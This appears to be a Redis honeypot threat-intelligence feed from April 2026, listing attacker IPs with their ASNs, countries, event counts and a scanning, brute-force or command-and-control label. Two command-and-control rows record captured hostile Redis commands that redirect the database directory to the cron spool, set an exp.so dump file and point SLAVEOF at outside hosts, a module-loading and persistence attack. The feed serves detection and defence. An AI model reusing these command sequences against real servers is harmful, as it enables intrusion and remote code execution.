| IPv4 | 139.59.245.108 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 155.212.219.222 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=198610; asn_org=Beget LLC; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 101.126.20.199 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 66.240.236.116 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 173.255.223.103 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 45.79.104.47 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 104.154.62.21 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 86.54.31.42 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 80.94.92.12 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 52.180.136.250 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 221.215.99.69 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 66.132.186.245 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 66.132.195.72 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 103.215.74.213 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=IN; asn=150303; asn_org=SoloRDP; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 193.163.125.19 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 3.143.162.210 | Attacker IP • Redis / seen in Redishoneypot; events=96; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L....X.l.-....K.@e.....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-04-10 | |
| IPv4 | 199.45.154.178 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 205.210.31.173 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 66.132.195.120 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 130.94.21.201 | Attacker IP • Redis / seen in Redishoneypot; events=48; ports=6379; cc=US; asn=154177; asn_org=LIGHT NODE LIMITED; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 65.49.1.24 | Attacker IP • Redis / seen in Redishoneypot; events=31; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 113.249.112.198 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=134420; asn_org=Chongqing Telecom; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 139.186.131.64 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 47.86.5.176 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 66.132.195.152 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-10 | |
| IPv4 | 149.28.232.89 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=20473; asn_org=The Constant Company, LLC; redis_cmds=INFO modules; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 85.11.167.11 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=BG; asn=213438; asn_org=ColocaTel Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 20.168.124.121 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 123.56.146.124 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 91.230.168.210 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 91.230.168.212 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 198.235.24.181 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 172.105.177.106 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | bruteforce | 2026-04-10 | |
| IPv4 | 20.80.83.148 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 1.203.97.227 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4847; asn_org=China Networks Inter-Exchange; redis_cmd_hits=0 | scanning_host | 2026-04-11 | |
| IPv4 | 107.150.31.215 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 152.32.185.141 | Attacker IP • Redis / seen in Redishoneypot; events=57; ports=6379; cc=HK; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 68.183.96.183 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-11 | |
| IPv4 | 210.245.79.58 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=18403; asn_org=FPT Telecom Company; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 138.197.101.95 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 172.245.219.236 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 173.255.242.196 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-11 | |
| IPv4 | 20.64.104.78 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 80.94.92.13 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-11 | |
| IPv4 | 104.248.48.89 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 137.184.96.231 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 85.217.140.10 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=FR; asn=209334; asn_org=Modat B.V.; redis_cmds='GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 45.228.8.33 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=BR; asn=267062; asn_org=W-NET TELLECOM EIRELI ME; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 52.185.213.71 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-11 | |
| IPv4 | 185.48.228.127 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=197540; asn_org=netcup GmbH; redis_cmd_hits=0 | scanning_host | 2026-04-11 | |
| IPv4 | 120.53.106.134 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 18.119.209.50 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 66.132.186.187 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 198.235.24.239 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 20.81.50.12 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 20.163.15.196 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 20.65.194.43 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 71.6.134.230 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 36.133.212.147 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 64.62.197.62 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 64.62.197.65 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 97.107.141.150 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 185.242.226.92 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 213.171.194.188 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 14.103.198.15 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 20.70.200.3 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=AU; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 20.87.195.148 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 147.185.132.111 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 45.76.236.250 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=20473; asn_org=The Constant Company, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 81.69.43.221 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 136.144.253.66 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=20857; asn_org=Signet B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 91.230.168.138 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 91.230.168.139 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-12 | |
| IPv4 | 91.230.168.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-04-12 | |
| IPv4 | 18.190.15.50 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 130.107.183.10 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 137.184.101.104 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 193.163.125.27 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 194.186.66.94 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=3216; asn_org=PVimpelCom; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 3.134.216.108 | Attacker IP • Redis / seen in Redishoneypot; events=102; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-04-13 | |
| IPv4 | 51.8.231.189 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 130.94.115.133 | Attacker IP • Redis / seen in Redishoneypot; events=47; ports=6379; cc=US; asn=154177; asn_org=LIGHT NODE LIMITED; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 61.69.149.213 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=AU; asn=7545; asn_org=TPG Telecom Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 134.199.160.198 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 170.64.145.51 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 142.93.255.85 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 117.72.13.101 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 172.174.236.9 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 198.199.77.66 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 82.180.144.91 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=141995; asn_org=Contabo Asia Private Limited; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 220.248.173.137 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 98.89.204.118 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-13 | |
| IPv4 | 159.65.176.39 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 205.210.31.171 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-13 | |
| IPv4 | 20.168.122.30 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 192.241.134.55 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 3.15.232.67 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-14 | |
| IPv4 | 106.52.223.49 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-14 | |
| IPv4 | 74.208.148.36 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 211.154.194.36 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 66.132.224.233 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 162.240.163.65 | Attacker IP • Redis / seen in Redishoneypot; events=34; ports=6379; cc=US; asn=46606; asn_org=Unified Layer; redis_cmds=config set dir /var/spool/cron/,save,SLAVEOF NO ONE,CONFIG SET dbfilename exp.so,SLAVEOF 180.76.137.37 60135; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-14 | |
| IPv4 | 23.92.27.206 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-14 | |
| IPv4 | 39.107.103.199 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 20.169.104.246 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-14 | |
| IPv4 | 157.230.95.152 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 195.178.110.103 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=BG; asn=48090; asn_org=Techoff Srv Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 66.132.224.236 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 175.178.24.123 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 71.6.232.30 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 20.168.120.149 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 52.177.119.222 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 65.49.1.162 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 65.49.1.165 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 112.124.51.59 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 159.223.111.193 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 159.223.169.93 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-15 | |
| IPv4 | 194.50.16.198 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 27.152.56.190 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-15 | |
| IPv4 | 3.151.241.153 | Attacker IP • Redis / seen in Redishoneypot; events=96; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..C.....p.)...r.......curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-04-16 | |
| IPv4 | 66.132.172.227 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-16 | |
| IPv4 | 66.132.172.38 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-16 | |
| IPv4 | 193.163.125.32 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-16 | |
| IPv4 | 20.169.104.65 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-16 | |
| IPv4 | 124.117.192.24 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-16 | |
| IPv4 | 20.175.198.186 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-16 | |
| IPv4 | 220.95.208.142 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=KR; asn=4766; asn_org=Korea Telecom; redis_cmds=save,CONFIG SET dbfilename exp.so,SLAVEOF 185.202.223.90 9659,config set dir /var/spool/cron/,config set dir .; redis_cmd_hits=0; cmd="config set dbfilename dump.rdb" | command_and_control | 2026-04-16 | |
| IPv4 | 167.71.110.14 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-16 | |
| IPv4 | 45.156.129.60 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
